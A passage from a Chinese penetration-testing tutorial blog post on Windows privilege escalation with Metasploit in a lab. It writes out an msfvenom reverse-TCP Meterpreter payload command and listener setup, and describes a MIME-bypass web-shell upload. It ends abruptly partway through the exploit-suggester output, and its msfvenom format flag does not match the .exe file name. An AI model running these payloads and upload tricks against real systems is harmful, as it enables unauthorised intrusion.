118.网络安全渗透测试—[权限提升篇16]—[Windows MSF提权模块&提权审计工具]

本文介绍了如何结合MSF(Metasploit Framework)进行Windows系统的权限提升,包括使用local_exploit_suggester模块进行漏洞审计,通过上传exploit获取低权限shell,以及测试不同提权模块。同时,还详细讲解了利用Python编写的Windows-Exploit-Suggester工具进行补丁审计,找出可能的提权漏洞,并在靶机上测试了ms15-051的两个exp。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!!

一、MSF 结合漏洞审计工具进行提权

1、MSF漏洞审计模块:local_exploit_suggeste

(1)生成攻击载核:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.97.130 lport=12345 -f php > 64.exe

(2)msf开启监听:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.97.130
set lport 12345
exploit
在这里插入图片描述

(3)利用文件上传的MIME白名单类型突破,上传了up.aspx大马,然后上传64.exe并执行,后得到一个低权限的shell:
在这里插入图片描述
在这里插入图片描述

(4)当前session下执行漏洞检测模块:

run post/multi/recon/local_exploit_suggester #这里没有扫描到漏洞,可以换个方法扫描
在这里插入图片描述

[+] 192.168.97.131 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 192.168.97.131 - exploit/windows/local/ikeext_service: The target appears to be vulnerable.
[+] 192.168.97.131 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 1
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

qwsn

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值